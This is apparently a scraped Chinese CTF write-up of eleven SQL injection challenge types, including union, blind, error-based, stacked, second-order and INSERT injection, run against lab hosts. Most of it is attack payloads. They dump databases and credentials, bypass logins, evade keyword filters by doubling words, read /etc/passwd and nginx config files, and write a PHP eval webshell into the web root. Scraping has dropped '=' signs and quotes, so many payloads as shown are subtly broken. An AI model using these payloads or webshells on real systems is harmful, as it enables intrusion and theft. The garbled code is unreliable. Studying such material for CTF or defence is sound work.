网站搭建原则,中国建设银行 英文网站,wordpress更改鼠标,本科自考需要考哪些科目文章目录 题型一 #xff08; 字符型注入 #xff09;题型二 #xff08; 整数型注入 #xff09;题型三 #xff08; 信息收集SQL注入#xff09;题型四 #xff08; 万能密码登录 #xff09;题型五 #xff08; 搜索型注入文件读写 #xff09;题型六 #xff08… 文章目录 题型一 字符型注入 题型二 整数型注入 题型三 信息收集SQL注入题型四 万能密码登录 题型五 搜索型注入文件读写 题型六 布尔盲注 Burp Suite题型七 延时盲注 Burp Suite 题型八 报错注入 题型九 堆叠注入 题型十 二次注入 题型十一 INSERT注入 题型一 字符型注入 首先看题目、需要输入ID号 输入 1 点击查询 这里提示SQL语句为 SELECT * FROM userinfo WHERE Id 1判断注入点构造闭合语句进行逻辑尝试得出 1’ 报错、1‘#不报错、‘1’ and 11 #’ 不报错、‘1’ and 12 #’ 报错由此可得此题为字符型SQL注入漏洞。 SELECT * FROM userinfo WHERE Id 1SELECT * FROM userinfo WHERE Id 1#SELECT * FROM userinfo WHERE Id 1 and 11 #SELECT * FROM userinfo WHERE Id 1 and 12 #使用 ORDER BY 语句判断列数到5时报错判断列数为4 SELECT * FROM userinfo WHERE Id 1 order by 1 #
......
SELECT * FROM userinfo WHERE Id 1 order by 5 #使用 UNION SELECT 判断显示位 SELECT * FROM userinfo WHERE Id -1 union select 1,2,3,4 #爆数据库、爆数据包、爆字段、爆字段数据、拿到flag值 SELECT * FROM userinfo WHERE Id -1 union select 1,2,3,group_concat(schema_name) from information_schema.schemata #SELECT * FROM userinfo WHERE Id -1 union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schemadatabase() #SELECT * FROM userinfo WHERE Id -1 union select 1,2,3,group_concat(column_name) from information_schema.columns where table_schemadatabase() and table_nameflag #SELECT * FROM userinfo WHERE Id -1 union select 1,2,3,group_concat(Id,:,flag) from flag # 题型二 整数型注入 先看题需要输入1试试 提示sql语句为 select * from news where id1判断注入类型、1 显示数据、1‘ 不显示 1’# 也不显示、11显示ID2由此判断该注入类型为整数型注入 select * from news where id1select * from news where id1select * from news where id1#select * from news where id11逻辑判断 select * from news where id1 and 11 select * from news where id1 and 12使用 ORDER BY 语句判断列数3位时报错、判断列数为2 select * from news where id1 order by 3使用 UNION SELECT 判断显示位 select * from news where id-1 union select 1,2爆数据库、爆数据包、爆字段、爆字段数据、拿到flag值 select * from news where id-1 union select group_concat(schema_name),2 from information_schema.schemataselect * from news where id-1 union select group_concat(table_name),2 from information_schema.tables where table_schemadatabase()select * from news where id-1 union select group_concat(column_name),2 from information_schema.columns where table_schemadatabase() and table_nameflagselect * from news where id-1 union select group_concat(flag),2 from flag 题型三 信息收集SQL注入 先看题点击了几个点都没有发现可以注入的地方 点击F12 - 网络 - 点击测试新闻1 - F5刷新页面 - 发现存在一个连接地址 ‘/backend/content_detail.php?id1’ 进行访问并尝试SQL注入通过页面回显发现是整数型注入 /content_detail.php?id1/content_detail.php?id2/content_detail.php?id3/content_detail.php?id1/content_detail.php?id1#/content_detail.php?id1 and 11/content_detail.php?id1 and 12找到注入点后面就进行常规的SQL注入就行了 /backend/content_detail.php?id1 order by 3/backend/content_detail.php?id-1 union select 1,2/backend/content_detail.php?id-1 union select group_concat(schema_name),2 from information_schema.schemata/backend/content_detail.php?id-1 union select group_concat(table_name),2 from information_schema.tables where table_schemadatabase()/backend/content_detail.php?id-1 union select group_concat(column_name),2 from information_schema.columns where table_schemadatabase() and table_nameadmin/backend/content_detail.php?id-1 union select group_concat(id,:,username,:,password),2 from admin 得出结果为如下看起来好像是md5加密的但是通过解密平台无法解密、那我们尝试直接使用此账号密码登录一下试试 1:admin:756ba5042c492a3c2481f29e6b796bd6登录成功获取到flag 题型四 万能密码登录 先看题 使用弱口令密码 admin:admin 登录失败显示 ‘ NO,Wrong username password’ 尝试寻找闭合方法发现是单引号闭合因为报了一个语法错误 adminYou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near admin at line 1尝试使用万能密码绕过登录发现登录失败尝试使用 || 绕过 or发现登录成功这题就是过滤了 ‘or’ admin or 11admin || 11题型五 搜索型注入文件读写 先看题目通过点击页面发现一些注入点在尝试闭合操作和逻辑判断的时候都显示非法访问这时候就要改变一下思路了。 发现有个搜索框那么对搜索框进行一下SQL注入 //模拟一下后台SQL语句
select * from users where key%xxx%// 我们先传一个 1 试试如果按照我们试想的语句应该是不会报错并可以返回数据的; 成功返回数据
select * from users where key%1%//那我构造一个闭合语句呢我们传参一个 1%# ,发现还是正常返回数据
select * from users where key%1% #%//那继续构造一个逻辑语句我们传参 1% and 11# 1% and 12# ,发现12没有返回数据这样正符合我们预期由此判断此搜索框存在SQL注入漏洞select * from users where key%1% and 11#%
select * from users where key%1% and 12#%进行列数、显示位判断 1% order by 3 #-1% union select 1,2,3 #测试一下是否可以进行文件读写操作发现可以进行读文件 -1% union select 1,2,load_file(/etc/passwd) #那么接下来我们需要通过进行信息收集的方法找到网站的绝对路径或者网站根目录进行文件写马操作通过webshell获取网站权限打开 F12 - 网络分析一下发现此网站的中间件是nginx那么我们可以通过读一下nginx的默认配置文件路径来获取更多的信息。 通过配置文件发现了网站根目录接下来就可以进写马操作 key-1% union select 1,2,load_file(/etc/nginx/nginx.conf) #-1% union select 1,2,?php eval($_REQUEST[cmd]);? into outfile /var/www/html/1.php #写完之后进行访问并使用蚁剑进行测试连接连接成功获取了flag http://xxxxx:8141/1.php题型六 布尔盲注 Burp Suite
?id1 and 11# 判断长度
?id1 and length((select database()))1 # 循环遍历key1米 and 10length((select database()))#-- 判断具体数据
?id1 and substr((select database()),1,1)a key1米 and substr((select database()),1,1)s #-- 判断所有的数据库
?id1 and length(( select group_concat(schema_name) from information_schema.schemata ))1
?id1 and substr(( select group_concat(schema_name) from information_schema.schemata ),1,1)a -- 判断指定的数据库的数据表
?id1 and length(( select group_concat(table_name) from information_schema.tables where table_schemadatabase() ))1
?id1 and substr(( select group_concat(table_name) from information_schema.tables where table_schemadatabase() ),1,1)a -- 判断指定的数据库的数据表的字段
?id1 and length(( select group_concat(column_name) from information_schema.columns where table_name表名 ))1
?id1 and substr(( select group_concat(column_name) from information_schema.columns where table_name表名 ),1,1)a -- 判断指定的数据库的数据表的字段的具体值
?id1 and length(( select group_concat(id,username,password) from 表名 ))1
?id1 and substr(( select group_concat(id,username,password) from 表名 ),1,1)a -- 判断所有的数据库
?id1 and length(( select group_concat(schema_name) from information_schema.schemata ))1
?id1 and substr(( select group_concat(schema_name) from information_schema.schemata ),1,1)a -- 判断指定的数据库的数据表
?id1 and length(( select group_concat(table_name) from information_schema.tables where table_schemadatabase() ))1
?id1 and substr(( select group_concat(table_name) from information_schema.tables where table_schemadatabase() ),1,1)a -- 判断指定的数据库的数据表的字段
?id1 and length(( select group_concat(column_name) from information_schema.columns where table_name表名 ))1
?id1 and substr(( select group_concat(column_name) from information_schema.columns where table_name表名 ),1,1)a -- 判断指定的数据库的数据表的字段的具体值
?id1 and length(( select group_concat(id,username,password) from 表名 ))1
?id1 and substr(( select group_concat(id,username,password) from 表名 ),1,1)a使用 Burp Suite 进行布尔盲注操作 先看题、首先抓一个数据包、发送到爆破模块 判断注入类型通过页面回显发现为字符型 http://192.168.174.128:8081/Less-8?id1
http://192.168.174.128:8081/Less-8?id1
http://192.168.174.128:8081/Less-8?id1 and 11 --
http://192.168.174.128:8081/Less-8?id1 and 12 --判断数据库长度、通过BP抓包并循环遍历 http://192.168.174.128:8081/Less-8?id1 and length((select database()))1 --通过长度判断、数据库长度为8 判断数据库具体值抓包进行爆破 http://192.168.71.109:8081/Less-8?id1 and mid(((select database())),1,1)a --爆破得出 数据库名为‘security’ 判断指定的数据库的数据表长度和具体数据 http://192.168.71.109:8081/Less-8?id1 and length((select group_concat(table_name) from information_schema.tables where table_schemadatabase()))1 --http://192.168.71.109:8081/Less-8?id1 and mid((select group_concat(table_name) from information_schema.tables where table_schemadatabase()),1,1)a --当前数据库得数据表长度为 29 数据库表得具体数据:emails,referers,uagents,users 判断指定的数据库的数据表的字段长度判断为 20 http://192.168.71.109:8081/Less-8?id1 and length((select group_concat(column_name) from information_schema.columns where table_nameusers and table_schemadatabase()))1 --判断指定的数据库的数据表的字段值值为id,username,password http://192.168.71.109:8081/Less-8?id1 and mid((select group_concat(column_name) from information_schema.columns where table_nameusers and table_schemadatabase()),1,1)a --判断指定的数据库的数据表的字段的具体值 http://192.168.71.109:8081/Less-8?id1 and mid((select group_concat(id,username,password) from users ),1,1)a --题型七 延时盲注 Burp Suite 先看题、首先判断注入点和注入类型 username1password1
username1password1
username1#password1
username1 oorr 12 #password1
username1 oorr 11 #password1
username1 oorr slsleepeep(3)#password1发现过滤了and or sleep if select mid from mid并测试and没有用使用双写or进行逻辑判断发现存在字符型延时注入漏洞 判断当前数据库长度首先抓包然后爆破长度记得选择通过响应时间筛选延时最大的那个就是我们想要得数字判断数据库长度为 5 username1 oorr iiff((length((seselectlect database()))1),slsleepeep(6),1) #password1判断当前数据库得具体数据依旧对比响应时间和长度判断数据库值为hazel username1 oorr iiff((mimidd((select database()),1,1)a),slsleepeep(6),1) #password1判断当前数据库下表的长度发现表长度为 5 username1 oorr iiff((length((seselectlect group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schemadatabase()))1),slsleepeep(6),1) #password1判断表的具体值得出表名为users username1 oorr iiff((mimidd((seselectlect group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schemadatabase()),1,1)a),slsleepeep(6),1) #password1判断表中的列名的长度得出长度为 20 username1 oorr iiff((length((seselectlect group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_schemadatabase() anandd table_nameusers))1 ),slsleepeep(6),1) #password1判断表中的列名的具体值得到具体值为id,username,password username1 oorr iiff((mimidd((seselectlect group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_schemadatabase() anandd table_nameusers),1,1)a ),slsleepeep(6),1) #password1获得flag值, username1 oorr iiff((mimidd((seselectlect group_concat(id,username,passwoorrd) frfromom users),1,1)a ),slsleepeep(6),1) #password1获取flag值还是最好使用ASCII码username1 oorr iiff((asasciicii(mimidd((seselectlect group_concat(id,username,passwoorrd) frfromom users),1,1))1 ),slsleepeep(6),1) #password1题型八 报错注入 先看题目随便输入一个账号密码会报错 # NO,Wrong username password 判断注入点和注入类型发现为字符型注入并过滤了 很多字符双写绕过就行了 并存在报错注入 /check.php?username1password1
/check.php?username1%23password1
/check.php?usernameadmin anandd/**/11 %23password1
/check.php?usernameadmin anandd/**/12 %23password1查当前数据库得到数据库为geek /check.php?username1 anandd/**/updatexml(1,concat(0x7e,(select database()),0x7e),1)%23passworda查看所有数据库得到数据为 ‘~information_schema,geek,mysql,p’ /check.php?username1 anandd/**/updatexml(1,concat(0x7e,(seselectlect/**/group_concat(schema_name)/**/frfromom/**/infoorrmation_schema.schemata),0x7e),1)%23passworda查看geek数据库下的表得到表为‘geekuser,ssql’ /check.php?username1 anandd/**/updatexml(1,concat(0x7e,(seselectlect/**/group_concat(table_name)/**/frfromom/**/infoorrmation_schema.tables/**/whwhereere/**/table_schemadatabase()),0x7e),1)%23passworda查看geekuser表字段得到字段为‘id,username,password’ /check.php?username1 anandd/**/updatexml(1,concat(0x7e,(seselectlect/**/group_concat(column_name)/**/frfromom/**/infoorrmation_schema.columns/**/whwhereere/**/table_schemadatabase()/**/anandd/**/table_namegeekuser),0x7e),1)%23passworda查看字段具体值 得到账号密码 ‘~1admine28dd73cc01b8087e30fcc023’ ?username1 anandd/**/updatexml(1,concat(0x7e,(seselectlect/**/group_concat(id,username,passwoorrd)/**/frfromom/**/geekuser),0x7e),1)%23passworda题型九 堆叠注入 先看题发现有提示 ‘别打头’ 注入点可能是http头部注入 抓POST包构造语句进行注入修改User-Agent字段看响应包得长度发现存在注入点 User-Agent: 1
User-Agent: 1
User-Agent: 1#
User-Agent: 1 and 12 #
User-Agent: 1 and 11 #POST / HTTP/1.1
Host: hazelshishuaige.club:8120
User-Agent: 1
Accept: text/html,application/xhtmlxml,application/xml;q0.9,*/*;q0.8
Accept-Language: zh-CN,zh;q0.8,en-US;q0.5,en;q0.3
Accept-Encoding: gzip, deflate
Referer: http://hazelshishuaige.club:8120/
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 38unameadminpasswdadminsubmitSubmit使用堆叠注入获取当前数据库为hazel POST / HTTP/1.1
Host: hazelshishuaige.club:8120
User-Agent: 1 ;select database();#
Accept: text/html,application/xhtmlxml,application/xml;q0.9,*/*;q0.8
Accept-Language: zh-CN,zh;q0.8,en-US;q0.5,en;q0.3
Accept-Encoding: gzip, deflate
Referer: http://hazelshishuaige.club:8120/
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 38unameadminpasswdadminsubmitSubmit获取当前数据库得表名 POST / HTTP/1.1
Host: hazelshishuaige.club:8120
User-Agent: 1 ;select database();use hazel;show tables;#
Accept: text/html,application/xhtmlxml,application/xml;q0.9,*/*;q0.8
Accept-Language: zh-CN,zh;q0.8,en-US;q0.5,en;q0.3
Accept-Encoding: gzip, deflate
Referer: http://hazelshishuaige.club:8120/
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 38unameadminpasswdadminsubmitSubmit23323333/p/htmlhtmlp hidden emails/p/htmlhtmlp hidden referers/p/htmlhtmlp hidden uagents/p/htmlhtmlp hidden users/p/html/font查看 23323333 表中数据获得了flag值flag{7609695b-15ae-4310-aaf1-85c773c14858} POST / HTTP/1.1
Host: hazelshishuaige.club:8120
User-Agent: 1 ;select database();use hazel;show tables;select * from 23323333;#
Accept: text/html,application/xhtmlxml,application/xml;q0.9,*/*;q0.8
Accept-Language: zh-CN,zh;q0.8,en-US;q0.5,en;q0.3
Accept-Encoding: gzip, deflate
Referer: http://hazelshishuaige.club:8120/
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 38unameadminpasswdadminsubmitSubmit题型十 二次注入 首先看题找到题目所有的功能点有注册登录重置密码 让我们使用admin用户进行登录即可获取key这题又是二阶注入题目那么我们先试试能否注册一个 admin用户发现admin用户已经被注册那就没有办法去利用 那我们试想一下注册一个 admin’ 这样的用户呢构造一下 重置密码的SQL语句 update users set password$pass where username $name如果 $name 是被单引号包裹的话重置 admin’ 这个用户的密码那么就会出现报错我们验证一下 update users set password$pass where username admin创建成功登录并进行重置密码操作 发现没有任何反应因为正常操作重置密码会提示 ‘成功’ 我们注册的 admin‘ 没有任何提示 那么我们就可以判断重置密码界面可能存在注入点那么我们就可以构造恶意用户让引号进行包裹在进行重置密码就相当于重置了admin账号的密码就可以进行登录操作了。 update users set password$pass where username admin#创建成功登录并修改密码 然后使用admin账号和刚刚修改的密码登录发现成功获取了flag值flag{f5f3df31-6c0e-44c1-bf9e-248d53571bda} 题型十一 INSERT注入 查看题目 点击文章发布随便发一个文章并进行抓包 响应包返回了SQL语句 insert into article(title,author,description,content,dateline) values(1,2,3,4,1701156599)构造注入语句 insert into article(title,author,description,content,dateline) values(1,2,3,4,123),(1,2,3,(select database()),5) #,1701156599)需要替换的语句为 4,123),(1,2,3,(select database()),5) #爆表名 4,123),(1,(select group_concat(table_name) from information_schema.tables where table_schemadatabase() ),3,4,5) #爆列名 4,123),(1,2,3,(select group_concat(column_name) from information_schema.columns where table_namehazel and table_schemadatabase()),5) #爆字段名 4,123),(1,2,3,(select group_concat(flag_is_here) from hazel ),5) #拿到flagflag{f57d071a-97ee-4e39-99ed-35c9cda4258d}
